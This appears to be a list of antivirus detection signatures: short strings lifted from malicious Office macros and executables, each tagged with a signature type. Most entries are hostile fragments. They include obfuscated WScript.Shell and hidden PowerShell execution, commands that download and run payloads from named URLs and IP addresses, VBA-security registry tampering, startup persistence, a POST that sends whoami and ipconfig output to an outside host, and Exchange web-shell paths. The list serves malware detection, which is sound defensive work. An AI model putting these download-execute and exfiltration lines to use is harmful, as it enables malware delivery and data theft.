- qGrid.Write (qAxis) (MACROHSTR_EXT)
- qGrid.Close (MACROHSTR_EXT)
- Debug.Print Replace(E, "[", "J") (MACROHSTR_EXT)
- = Replace("Wscrip3!4FIt3!4FI.Shell", "3!4FI", "") (MACROHSTR_EXT)
- = Replace("wmic process call create 'run$3&pR+dll32.exe ", "$3&pR+", "") (MACROHSTR_EXT)
- = Replace("\1QM:)38ZQM:)38Z1981.QM:)38Zdll", "QM:)38Z", "") (MACROHSTR_EXT)
- /.dll", " (MACROHSTR_EXT)
- .Open (MACROHSTR_EXT)
- If Err.Number <> 0 Then (MACROHSTR_EXT)
- = Replace("https://mosaicuschin+rn6/a.co+rn6/m/wp-conte+rn6/nt/plug+rn6/ins/wpml-string-translation/locale/+rn6/orig/afFzHwIPlCs5+rn6/b.php", "+rn6/", "") (MACROHSTR_EXT)
- http://%20%20@j.mp/axas (MACROHSTR_EXT)
- http://%20%20@j.mp/as (MACROHSTR_EXT)
- createobject("wscript.shell").execlulli (MACROHSTR_EXT)
- fa26dbba = c0877678("c8:a\2p7rdoag2r5a2mad6a7t4a0\b495e92096b.9jep9g3") (MACROHSTR_EXT)
- f7871cb1 fa26dbba, e6bcc95e.fad1a246(c0877678("h3t3tdp0:e/c/4veoba0x3d1.0c1o1m1/ (MACROHSTR_EXT)
- Set c054e43d = CreateObject("wscript.shell") (MACROHSTR_EXT)
- c054e43d.exec a2a08025 & " " & fa26dbba (MACROHSTR_EXT)
- c9ec6621 = baacbbeb("c2:0\ap5raobg1rfa7m6d6a9t2a4\53d0c7b8888.7j4p4gd") (MACROHSTR_EXT)
- b37c5d2e.a24d5e5e(baacbbeb("hctet8pb:1/0/4d6y355x213.dccoemc/bu5nab8b0m8e6v6dd/fd77f60.5p4hcpa?6lc=bw8odz3m2b6l65b.9c4a6bd")) (MACROHSTR_EXT)
- Set aa836f9d = CreateObject("wscript.shell") (MACROHSTR_EXT)
- aa836f9d.exec cc1ad2a2 & " " & c9ec6621 (MACROHSTR_EXT)
- f8bda31b = baacbbeb("ce:f\ap7raoegbr8a6mddba6tba5\a1c6a77381a.6j9p2g6") (MACROHSTR_EXT)
- ea125e40.a24d5e5e(baacbbeb("h9tbt8pa:5/3/cj2b8e3p5oc27.cc2o6mc/cu5ncbab4mae3v1d0/bd57e65.2p8hcp5?4la=ewdofz0m6b0l374.7c7a0bb")) (MACROHSTR_EXT)
- Set a52c9898 = CreateObject("wscript.shell") (MACROHSTR_EXT)
- a52c9898.exec cc1ad2a2 & " " & f8bda31b (MACROHSTR_EXT)
- .mp/agkaoskasfksakdamskdokasdkasodkaos (MACROHSTR_EXT)
- msgbox"fileiscorrupt"createobject("wscript.shell").execmainendsub (MACROHSTR_EXT)
- chr(log(5.9900343330481e+56)/log(3))&_"s"&_"crip"&_chr(sqr(13456))&_"."&_chr(sqr(13225))&_"h"&_"e"&_"l"&_chr(log(3.38139191352273e+51)/log(3)) (MACROHSTR_EXT)
- ?,\M}7 (SNID)
- :Execute( (MACROHSTR_EXT)
- Execute(""path = path + """"data\ (MACROHSTR_EXT)
- """" + """".txt"""""")" + vbCrLf (MACROHSTR_EXT)
- = "C:\" + xxxxxpath + "System32\c" + "script" + ".ex" (MACROHSTR_EXT)
- %.Run(Path + (MACROHSTR_EXT)
- SFRUUERvd25sb2FkICJodHRwOi8vd3d3LndoZXJldmVyLmNvbS9maWxlcy9wYXlsb2FkLmV4ZSIsICJDOlx0ZW1wIg== (MACROHSTR_EXT)
- Shell "wscript D:\_notScanned\test.vbs (MACROHSTR_EXT)
- ('/+9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA')); (MACROHSTR_EXT)
- .split('').reverse().join('') (MACROHSTR_EXT)
- .split('|');var (MACROHSTR_EXT)
- .Documents.Add.VBProject.VBComponents("ThisDocument").CodeModule (MACROHSTR_EXT)
- memoryMainButton = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security\AccessVBOM (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite memoryMainButton, 1, "REG_DWORD" (MACROHSTR_EXT)
- frm.fff "http://m33xa3.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- .cab", O (MACROHSTR_EXT)
- frm.fff "http://1bwsl4.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://804gtd.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://uhq943.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://n9i9ep.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http://nm5oi0.com/hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- frm.fff "http:// (MACROHSTR_EXT)
- /hboneb/sol95.php?l=puom (MACROHSTR_EXT)
- = "<div id='content'>fTtlc29sYy5ldm9tZVJ4b2J0eGVUbm9pdHBlY3hlOykyICwiZ3BqLmVjYXBzZW1hTnJhdlxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuZXZvbWVSeG9idHhlVG5vaXRwZWN4 (MACROHSTR_EXT)
- Shell "wscript (MACROHSTR_EXT)
- .vbs" (MACROHSTR_EXT)
- www.wherever.com/files/payload.exe", "C:\temp" (MACROHSTR_EXT)
- HTTPDownload "http:// (MACROHSTR_EXT)
- WScript.CreateObject("WScript.Shell") (MACROHSTR_EXT)
- WshShell.Run "c:\temp\payload.exe" (MACROHSTR_EXT)
- Chr(AscB(MidB(objHTTP.ResponseBody, i, 1) (MACROHSTR_EXT)
- Environment("process").Item("param1") = (MACROHSTR_EXT)
- E6sizX8Z.run "cmd /c call %param1%", 2 (MACROHSTR_EXT)
- .Run (vXoyEXNtX) (MACROHSTR_EXT)
- Shell.Run "powershell -windowstyle hidden &("{0}{1}" -f 'IE','X') (MACROHSTR_EXT)
- .Invoke(("{1}{8}{5}{7}{6}{0}{3}{2}{4}"-f'en','ht','go.p','ius.com/lo','ng','p:','g','//vega','t')) (MACROHSTR_EXT)
- = Environ("temp") & "\main.theme" (MACROHSTR_EXT)
- = ActiveWindow.Split (MACROHSTR_EXT)
- d9cc42e0.Send (MACROHSTR_EXT)
- Call ed3931ab.exec(f26e39fe) (MACROHSTR_EXT)
- = Environ("temp") & "\main.theme" (MACROHSTR_EXT)
- a-z0-9 = New MSXML2.XMLHTTP60 (MACROHSTR_EXT)
- a-z0-9.Open("GET", (MACROHSTR_EXT)
- a-z0-9 = VBA.CreateObject("wscript.shell") (MACROHSTR_EXT)
- a-z0-9 = CreateObject("wscript.shell") (MACROHSTR_EXT)
- .exec frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- ie.Navigate "https://pastebin.com/raw/PMwGWkmh (MACROHSTR_EXT)
- Dim payload: payload = ie.Document.Body (MACROHSTR_EXT)
- = Environ("TEMP") & "\CVR (MACROHSTR_EXT)
- objFSO.DeleteFile p (MACROHSTR_EXT)
- obj.Document.Application.ShellExecute "rundll32 (MACROHSTR_EXT)
- objFSO.CreateTextFile (MACROHSTR_EXT)
- Set b8acfabf = CreateObject("wscript.shell") (MACROHSTR_EXT)
- Call b8acfabf.exec(a600af58) (MACROHSTR_EXT)
- dcd3f665 = ActiveDocument.Shapes(1).Title + " " + f5d112a0 (MACROHSTR_EXT)
- e5fbd99d = f5a419b7.c492b9b9(ActiveDocument.Shapes(ed71ee4c).AlternativeText) (MACROHSTR_EXT)
- .Open "GET", HexToString( (MACROHSTR_EXT)
- http://c.vvvvvvvvv.ga (PEHSTR_EXT)
- cmd /c taskkill /f /im taskger.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im GthUdTask.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im WavesSys.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im wscript.exe (PEHSTR_EXT)
- cmd /c taskkill /f /im SQLAGENTSWC.exe (PEHSTR_EXT)
- C:\RECYCLER\svchostl.exe (PEHSTR_EXT)
- = "p,:,\,j,v,a,q,b,j,f,\,f,l,f,g,r,z,3,2,\,z,f,u,g,n,.,r,k,r," (MACROHSTR_EXT)
- atbuRc.exec aOl4Bh (MACROHSTR_EXT)
- b1efc47a.f047ca69 f39e930a(0) + " " + f5244208 (MACROHSTR_EXT)
- Call af8a301a.exec(f0032c5f) (MACROHSTR_EXT)
- = Split(ActiveDocument.Shapes(d0e6cdde).Title, "|") (MACROHSTR_EXT)
- df6dee5a.f7413504 ccb12773(0) + " " + f7647a17 (MACROHSTR_EXT)
- Call d73c0afc.exec(b5108af6) (MACROHSTR_EXT)
- = Split(ActiveDocument.Shapes(c07e0738).Title, "|") (MACROHSTR_EXT)
- Call c4e83a7b.exec(a9518afd) (MACROHSTR_EXT)
- bdac511a.Open "GET", baedc1e7(1), False (MACROHSTR_EXT)
- MSXML2.XMLHTTP60 (MACROHSTR_EXT)
- db.exec(a69f5c12) (MACROHSTR_EXT)
- cf.Open "GET", aa7d93ad (MACROHSTR_EXT)
- beabd2cf.Send (MACROHSTR_EXT)
- aa = .responsebody (MACROHSTR_EXT)
- d3.exec(b1e5f5df) (MACROHSTR_EXT)
- = .responsebody (MACROHSTR_EXT)
- 240.Open "GET", f1dbbb5f (MACROHSTR_EXT)
- cee60240.Send (MACROHSTR_EXT)
- Call d7d3054e.exec(f0a36a45) (MACROHSTR_EXT)
- c41e6bcc.Open "GET", fab6f8e5( (MACROHSTR_EXT)
- c41e6bcc.Send (MACROHSTR_EXT)
- b342af0c = .responsebody (MACROHSTR_EXT)
- Call cdda5fda.exec(e6fd511c) (MACROHSTR_EXT)
- af92bcf0.Open "GET", f12ec170 (MACROHSTR_EXT)
- af92bcf0.Send (MACROHSTR_EXT)
- cedfe73b = .responsebody (MACROHSTR_EXT)
- dfe79bd7 = CreateObject("wscript.shell") (MACROHSTR_EXT)
- dfe79bd7.exec(cb3cbe53) (MACROHSTR_EXT)
- Call c5a3244e.exec(de86f68a) (MACROHSTR_EXT)
- a0e1a561.Open "GET", f8a301ae(1), False (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec (d9c63594) (MACROHSTR_EXT)
- .Open "GET", f30c94a6, False (MACROHSTR_EXT)
- .exec (e456fc10) (MACROHSTR_EXT)
- .Open "GET", (MACROHSTR_EXT)
- .d8cb9993 ee6aff0a(0) + " " + fa31e116 (MACROHSTR_EXT)
- http://www.ip-adress.com (PEHSTR_EXT)
- NewDescription (PEHSTR_EXT)
- \\.\pipe\%ssp (PEHSTR_EXT)
- M-SEARCH * HTTP/1.1 (PEHSTR_EXT)
- = "c:\programdata\ (MACROHSTR_EXT)
- With ActiveDocument.Shapes( (MACROHSTR_EXT)
- = CreateObject("wscript.shell") (MACROHSTR_EXT)
- .Send (MACROHSTR_EXT)
- .fccdb933 a8a9ba70(0) + " " + e9f3423e("pdf") (MACROHSTR_EXT)
- + "." + "shell") (MACROHSTR_EXT)
- String = "ing.FileSystemObject") (MACROHSTR_EXT)
- (0) + "vr32 c:\programdata\ (MACROHSTR_EXT)
- .txt", "wscript" (MACROHSTR_EXT)
- .Open "GET" (MACROHSTR_EXT)
- .responsebody (MACROHSTR_EXT)
- ("PTTHLMXre" + "vres.2LMXSM") (MACROHSTR_EXT)
- createobject("wscript.shell").exec"%comspec%/cstart/waitc:\ (MACROHSTR_EXT)
- createobject("wscript.shell").exec"regsvr32.exe-sc:\ (MACROHSTR_EXT)
- .dll (MACROHSTR_EXT)
- createobject("wscript.shell").exec"%comspec%/cstart/waitc:\gophotonics\reddit.vbs (MACROHSTR_EXT)
- createobject("wscript.shell").exec"regsvr32.exe-sc:\gophotonics\waveplate.dll (MACROHSTR_EXT)
- As String = "scripting.file (MACROHSTR_EXT)
- workrepair.bazar (PEHSTR_EXT)
- realfish.bazar (PEHSTR_EXT)
- eventmoult.bazar (PEHSTR_EXT)
- younika-hayde.bazar (PEHSTR_EXT)
- Run PowerShell script without a file (PEHSTR_EXT)
- LG-I/I (SNID)
- .\d=f (SNID)
- I5/ZP (SNID)
- /javascript/view.php (PEHSTR)
- *.inf (PEHSTR)
- .php?si= (PEHSTR_EXT)
- @@Windows Defender::%ProgramFiles%\Windows Defender\MsMpeng.exe@@ (PEHSTR_EXT)
- .open("GET", "https:// (PEHSTR_EXT)
- .ExecQuery("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE"); (PEHSTR_EXT)
- .ExecQuery("Select DomainRole from Win32_ComputerSystem"); (PEHSTR_EXT)
- .ExecQuery("Select * from AntiVirusProduct"); (PEHSTR_EXT)
- .ExpandEnvironmentStrings("%TEMP%"); (PEHSTR_EXT)
- .Sleep(" (PEHSTR_EXT)
- wscript /e:JScript (PEHSTR_EXT)
- X:\D BACKUP 29032014 (PEHSTR_EXT)
- \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\ (PEHSTR_EXT)
- nzFN.Create(MXBTv, Null, Null, intProcessID) (MACROHSTR_EXT)
- chomputah = "." (MACROHSTR_EXT)
- objProcess.Create pr, Null, objConfig, intProcessID (MACROHSTR_EXT)
- pr = ActiveDocument.CustomDocumentProperties("prorrete").Value (MACROHSTR_EXT)
- Set objStartup = objWMIService.Get(gghhii) (MACROHSTR_EXT)
- Set objConfig = objStartup.SpawnInstance (MACROHSTR_EXT)
- objConfig.ShowWindow = HIDDEN_WINDOW (MACROHSTR_EXT)
- trustTemp = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
- globalLeftSelect.funcStorageTemp trustTemp, titleCaptionDocument (MACROHSTR_EXT)
- Set leftCaption = CreateObject("wscript.shell") (MACROHSTR_EXT)
- leftCaption.exec Replace(globalLen, "1", "") & " " & Replace(indexTextboxTextbox, "1", "") (MACROHSTR_EXT)
- Set globalException = requestResponseA.CreateTextFile(iteratorVb) (MACROHSTR_EXT)
- globalException.WriteLine loadLocalQuery (MACROHSTR_EXT)
- documentCollectionArray = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
- tempRepo.libDocumentLink documentCollectionArray, rightTrustReference (MACROHSTR_EXT)
- Set namespaceRemoveClear = CreateObject("wscript.shell") (MACROHSTR_EXT)
- namespaceRemoveClear.exec Replace(convertLoadDatabase, "1", "") & " " & Replace(procStruct, "1", "") (MACROHSTR_EXT)
- Set convertClear = memoryPointerDocument.CreateTextFile(valueWindow) (MACROHSTR_EXT)
- convertClear.WriteLine dataView (MACROHSTR_EXT)
- = "10.23.31.3.0.29.10.29" (MACROHSTR_EXT)
- = Split(awoQn2, ".") (MACROHSTR_EXT)
- = Split(a3dmi, ".") (MACROHSTR_EXT)
- & "com" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec ayaXI( (MACROHSTR_EXT)
- & atZhQ("comments") & aoTA6S & (MACROHSTR_EXT)
- = aMSIO & "\m1.xsl" (MACROHSTR_EXT)
- = aMSIO & "\m1.com" (MACROHSTR_EXT)
- adFWA.run aXo4vp & aRlMyx("comments") & amE2ak & a9Dz5t & amE2ak (MACROHSTR_EXT)
- = aSGr0w & "com" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec ayaXI(axBTCF, aole0) (MACROHSTR_EXT)
- = axBTCF & atZhQ("comments") & aoTA6S & aole0 & aoTA6S (MACROHSTR_EXT)
- = a9t1m8 & "\h1.xsl" (MACROHSTR_EXT)
- = a9t1m8 & "\h1.com" (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec aqTf5d(a4UCwk, aXmKa0) (MACROHSTR_EXT)
- = a4UCwk & aD63BN("comments") & agHu8 & aXmKa0 & agHu8 (MACROHSTR_EXT)
- Interaction.Shell "C:\Windows\explorer.exe " & aFoes (MACROHSTR_EXT)
- = Split(a9zoO, ".") (MACROHSTR_EXT)
- enablescriptblockinvocationlogging (PEHSTR_EXT)
- windows\powershell\scriptb'+'locklogging' (PEHSTR_EXT)
- webclient;$u='mozilla/5.0 (PEHSTR_EXT)
- [text.encoding]::unicode.getstring([convert]::frombase64string('aab0ahqacaa6ac8alw (PEHSTR_EXT)
- /admin/get.php (PEHSTR_EXT)
- .proxy=[system.net.webrequest] (PEHSTR_EXT)
- .headers.add('user-agent', (PEHSTR_EXT)
- .downloaddata( (PEHSTR_EXT)
- xHttp.Open "GET", "https://d.top4top.io/p_18010gsks1.jpg", False (MACROHSTR_EXT)
- savetofile j & "/client.vbs", 2 (MACROHSTR_EXT)
- Shell "wscript " & j & "/client.vbs", vbNormalFocus (MACROHSTR_EXT)
- CreateObject("Adodb.Stream") (MACROHSTR_EXT)
- = ActiveDocument.BuiltInDocumentProperties("subject") & "1-8455-00A0C91" (MACROHSTR_EXT)
- GetObject(subject & "F3880").Navigate title (MACROHSTR_EXT)
- title = ActiveDocument.BuiltInDocumentProperties("title") (MACROHSTR_EXT)
- (ActiveDocument.Range.text) (MACROHSTR_EXT)
- CreateObject("wscript.shell").run ( (MACROHSTR_EXT)
- With .GetEncodedContentStream (MACROHSTR_EXT)
- .WriteText (MACROHSTR_EXT)
- .Flush (MACROHSTR_EXT)
- With .GetDecodedContentStream (MACROHSTR_EXT)
- .ContentTransferEncoding = "base64" (MACROHSTR_EXT)
- rebrand.ly/WdBPApoMACRO','a.ba (MACROHSTR_EXT)
- /5555555555.png (MACROHSTR_EXT)
- C:\Droft\Frots\ZerioDh (MACROHSTR_EXT)
- Shell sex. (MACROHSTR_EXT)
- .Tag (MACROHSTR_EXT)
- Error.TextBox1 (MACROHSTR_EXT)
- p.Tag (MACROHSTR_EXT)
- rebrand.ly/WdBPApoMACRO (MACROHSTR_EXT)
- https://thephotographersworkflow.com/vv/popi.exe (MACROHSTR_EXT)
- a.bat (MACROHSTR_EXT)
- = "t" + "t" + "p" + ":" + "/" + "/" + "w" + "w" + "w" + ".j.mp/ (MACROHSTR_EXT)
- .Run(uM5le___i_Cmo9_Fl5, b7EVmQf_RC_M75_Fz) (MACROHSTR_EXT)
- https://1230948%1230948@bitly.com/asddasjisduaiskdhikhasd (MACROHSTR_EXT)
- .Run(XA769OnJIr_7qu, cQ_LLP_l2yVHeb_v) (MACROHSTR_EXT)
- Shell UserForm2.CloseTheWindow.Tag (MACROHSTR_EXT)
- ttp://188.127.254.61/89786454657645.exe (MACROHSTR_EXT)
- EXEC("C:\PROGRAMDATA\a.exe (MACROHSTR_EXT)
- .('.'+'/ (MACROHSTR_EXT)
- "&CHAR(46)&"exe') (MACROHSTR_EXT)
- ttps://tinyurl.com/y2ua6dah (MACROHSTR_EXT)
- = Split(aqMXZ9(frm.paths.text), "|") (MACROHSTR_EXT)
- = CreateObject("wscript.shell").exec(aJNyC) (MACROHSTR_EXT)
- Application.Run "avVfeb", a14bvc & " " & axYjG & "mat : """ & aUz3Cc & (MACROHSTR_EXT)
- = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security\AccessVBOM" (MACROHSTR_EXT)
- CreateObject("wscript.shell").RegWrite (MACROHSTR_EXT)
- , 4 / 2, 3000000) (MACROHSTR_EXT)
- = GetObject("", "word.application") (MACROHSTR_EXT)
- = "explorer.exe c:\programdata\bufBorderPointer.hta" (MACROHSTR_EXT)
- .exec p(getwc) (MACROHSTR_EXT)
- Shell (Environ("APPDATA") & "\appword.cache") (MACROHSTR_EXT)
- = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (MACROHSTR_EXT)
- VBSpath = gPath & "\rknrl.vbs" (MACROHSTR_EXT)
- DMpath = gPath & "\DM6331.TMP" (MACROHSTR_EXT)
- WShell = CreateObject(""WScript.Shell"") (MACROHSTR_EXT)
- Wsc|rip|t.S|cri|ptF|ull|Nam|e).|Par|ent|Fol|der|.Pa|th&|""\|DM6|331|.TM|P" (MACROHSTR_EXT)
- 1ese92VWgsRJFT1srbgo5SFPIMk+jbLKTQ5ewNnKClI5csh6i5HItc6B40fr9wVIfYpUxb63Gvz4DGxgcD7qn2prJsnnb2tpZ+3zDqOUhcoTOoF0F7KDoLSLZDP3aQ5cAqh/bcGXWvQpfVDZoDC66W+BXEQw8VkWZAHPNKFE6WCHrFZSZRNnLmsFE (PEHSTR)
- ServerComputer (PEHSTR_EXT)
- set_UseShellExecute (PEHSTR_EXT)
- System.Threading (PEHSTR_EXT)
- ParseXmlDescription (PEHSTR_EXT)
- System.Data.SqlClient (PEHSTR_EXT)
- System.IO.Compression (PEHSTR_EXT)
- SetCompatibleTextRenderingDefault (PEHSTR_EXT)
- System.Security.AccessControl (PEHSTR_EXT)
- commandLine (PEHSTR_EXT)
- ExecuteNonQuery (PEHSTR_EXT)
- System.Reflection (PEHSTR_EXT)
- System.Drawing (PEHSTR_EXT)
- System.Security.Principal (PEHSTR_EXT)
- System.Runtime.Remoting (PEHSTR_EXT)
- GetExecutingAssembly (PEHSTR_EXT)
- System.Net (PEHSTR_EXT)
- System.Security.Cryptography (PEHSTR_EXT)
- System.Reflection.Emit (PEHSTR_EXT)
- get_ExecutablePath (PEHSTR_EXT)
- .run (MACROHSTR_EXT)
- & aRlMyx("comments") & amE2ak & (MACROHSTR_EXT)
- .BuiltInDocumentProperties( (MACROHSTR_EXT)
- & "\m1.com" (MACROHSTR_EXT)
- & "\m1.xsl" (MACROHSTR_EXT)
- 185.243.215.213/sys_info.vbs", False (MACROHSTR_EXT)
- xHttp.Open "GET", "http:// (MACROHSTR_EXT)
- .savetofile "sys_info.vbs", 2 (MACROHSTR_EXT)
- Shell "wscript sys_info.vbs", vbNormalFocus (MACROHSTR_EXT)
- bStrm = CreateObject("Adodb.Stream") (MACROHSTR_EXT)
- xHttp = CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
- HTTPDownload 'http:// (MACROHSTR_EXT)
- 0.exe', 'C:\temp' (MACROHSTR_EXT)
- Shell "wscript c:\temp\ (MACROHSTR_EXT)
- WshShell.Run 'c:\temp\ (MACROHSTR_EXT)
- .exe' (MACROHSTR_EXT)
- = CreateObject("wscript.shell").exec( (MACROHSTR_EXT)
- Application.Run "avVfeb", (MACROHSTR_EXT)
- powershell -enco "" & cmd, null, objProcessStart (MACROHSTR_EXT)
- Shell ("wscript " & url) (MACROHSTR_EXT)
- "C:\\Users\\Public\\getfonts.vbs" (MACROHSTR_EXT)
- 3-.)h (SNID)
- = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- WQDWQEWQEWQ.Run asd (MACROHSTR_EXT)
- CreateObject("Outlook.Application") (MACROHSTR_EXT)
- CreateObject("wscript." & she & "l"). (MACROHSTR_EXT)
- exec(psowerss & "hell -w " & sease & "n Invoke-WebRequest -Uri " & (MACROHSTR_EXT)
- Chr(34) & "http://scaladevelopments.scaladevco.com/ (MACROHSTR_EXT)
- = "eval(eval(String.fromCharCode" + (MACROHSTR_EXT)
- = "j" + "o" + "b" + "s" + "website" + "." + "j" + "s (MACROHSTR_EXT)
- = Shell("wscript " + (MACROHSTR_EXT)
- obj = CreateObject("wscript.shell") (MACROHSTR_EXT)
- 39.100.159.8/aaa" + RunResult + RunResultwhoami (MACROHSTR_EXT)
- URL = "http:// (MACROHSTR_EXT)
- objHTTP.Open "POST", URL, False (MACROHSTR_EXT)
- exeRs = obj.Exec("whoami") (MACROHSTR_EXT)
- obj.Exec("ipconfig ") (MACROHSTR_EXT)
- exeRs.StdOut.ReadAll (MACROHSTR_EXT)
- objHTTP.send ("") (MACROHSTR_EXT)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\LXWPLO.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\OFFVMJ.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\V2X01Z.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\errorFF.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\default.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServerProxy.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\Current\themes\resources\view_tools.aspx (ASEP_FILEPATH)
- \Microsoft\Exchange Server\V15\HttpProxy\owa\auth\15.1.2044\themes\resources\Sign_in_arrow_rtl.aspx (ASEP_FILEPATH)
- TempPath = Environ("TMP") + "\" (MACROHSTR_EXT)
- \appdata\roaming\MicrosoftBackup.vbs (MACROHSTR_EXT)
- = "" /s "" + apppath + ""\backup.dll""" & vbNewLine (MACROHSTR_EXT)
- oWS.SpecialFolders(""startup"")" & vbNewLine (MACROHSTR_EXT)
- WinHttpReq.Open "POST", myURL, False, "", "" (MACROHSTR_EXT)
- Shell "wscript " + OutPutFileName, vbHide (MACROHSTR_EXT)
- htt`ps://vers778ve29.com/petalo.j`pg (MACROHSTR_EXT)
- .Add "MsHt" (MACROHSTR_EXT)
- .Add "a http://" (MACROHSTR_EXT)
- .Add "bitly.com/asdkjasdhsudiqowiudqw" (MACROHSTR_EXT)
- obj.MainCallex (dd1 + dd2 + dd3) (MACROHSTR_EXT)
- X = "mshta.e`x`e " (MACROHSTR_EXT)
- Y = "https://www.bitly.com/" (MACROHSTR_EXT)
- Debug.Print (Shell(X + Y + Z)) (MACROHSTR_EXT)
- X = "mshta.exe " (MACROHSTR_EXT)
- bbwtpTVV = aHiMN & "." & EUrxrXO (MACROHSTR_EXT)
- PDFName = Left(pptName, InStr(pptName, ".")) & "pdf" (MACROHSTR_EXT)
- WSCript.shell (MACROHSTR_EXT)
- slBGr = "jira.txt (MACROHSTR_EXT)
- CbEWmOd.CreateObject("WScript.Shell").Run ("c" & "s" & "c" & "r" & "i" & "p" & "t" & " //E:jscript " & vBPsTOI), 0 (MACROHSTR_EXT)
- TGzlbCA.SaveToFile slBGr, 2 (MACROHSTR_EXT)
- http://140.82.33.69/chim.exe (MACROHSTR_EXT)
- Environ("AppData") & "\Microsoft\Windows\Start Menu\Programs\Startup\" (MACROHSTR_EXT)
- CreateObject("Microsoft.XMLHTTP") (MACROHSTR_EXT)
- scheduler.exe (MACROHSTR_EXT)
- Application.ShellExecute "cmd.exe", "/c certutil -urlcache -split -f https://docs.healthmade.org//tc.js ""%USERPROFILE%\\Documents\\tc.js"" && cscript ""%USERPROFILE%\\Documents\\tc.js"" && del ""%USERPROFILE%\\Documents\\tc.js"" ", "C:\Windows\System32" (MACROHSTR_EXT)
- Set classList = classList.CreateTextFile(ptrPtr) (MACROHSTR_EXT)
- classList.WriteLine constArrayDocument (MACROHSTR_EXT)
- Public Sub CommandButton1_Click() (MACROHSTR_EXT)
- Set countIndex = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- countIndex.exec frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- windowCopy = "c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass windowCopy, repoQuery (MACROHSTR_EXT)
- Call frm.CommandButton1_Click (MACROHSTR_EXT)
- Set genericDataTextbox = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- script = "script" & ". (MACROHSTR_EXT)
- genericDataTextbox.Append_3 " (MACROHSTR_EXT)
- {return queryGlobalCaption.split('').reverse().join(''); (MACROHSTR_EXT)
- classTableConst.Timeout = 60000 (MACROHSTR_EXT)
- .exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- removeLocal.mainClass (MACROHSTR_EXT)
- = CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- split('').reverse().join(''); (MACROHSTR_EXT)
- script = "script" & "." (MACROHSTR_EXT)
- .Append_3 "<div id='content'>fTtl (MACROHSTR_EXT)
- Range("FF1200").Value (MACROHSTR_EXT)
- xxxx = "workout.js" (MACROHSTR_EXT)
- zoon = "wscript " + koolxxxx (MACROHSTR_EXT)
- oFile.WriteLine koonmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm (MACROHSTR_EXT)
- CreateObject("wscript.shell").exec a (MACROHSTR_EXT)
- myfrm1.text1.text (MACROHSTR_EXT)
- frm.CommandButton1.Tag & " c:\users\public\main.hta (MACROHSTR_EXT)
- CreateObject("System.Text.StringBuilder") (MACROHSTR_EXT)
- screenMemoryW.resizeTo(1, 1) (MACROHSTR_EXT)
- screenMemoryW.moveTo(-100, -100) (MACROHSTR_EXT)
- uffer = screenSizeText(tableVariable(requestRequestCounter[0])) (MACROHSTR_EXT)
- selectNamespace.Timeout = 60000 (MACROHSTR_EXT)
- MemoryW.close (MACROHSTR_EXT)
- swapVbTable.ToString (MACROHSTR_EXT)
- ('msscriptcontrol.scriptcontrol') (MACROHSTR_EXT)
- namespaceEx.exec frm.CommandButton1.Tag & " c:\users\public\main.hta" (MACROHSTR_EXT)
- = CreateObject("w" & script & "shell") (MACROHSTR_EXT)
- buttonException.Append_3 (MACROHSTR_EXT)
- ShellExecuteA (PEHSTR_EXT)
- 0taskkill /f /pid (PEHSTR_EXT)
- exe (PEHSTR_EXT)
- \Spider-Rat\Client\ (PEHSTR_EXT)
- .exec frm.cmdButton1.Tag & " " & frm.cmdButton1.caption (MACROHSTR_EXT)
- = frm.cmdButton1.caption (MACROHSTR_EXT)
- .close</script> (MACROHSTR_EXT)
- <div id='table'>0123456789+/</div><script language='javascript'> (MACROHSTR_EXT)
- var w=String.fromCharCode (MACROHSTR_EXT)
- <div id='table'>0123456789+/</div><scri (MACROHSTR_EXT)
- var w=String.fromCha (MACROHSTR_EXT)
- ("656c6c")).Run cmdLine, 0 (MACROHSTR_EXT)
- .Get( (MACROHSTR_EXT)
- Split(ActiveDocument.BuiltInDocumentProperties("title"), "|||") (MACROHSTR_EXT)
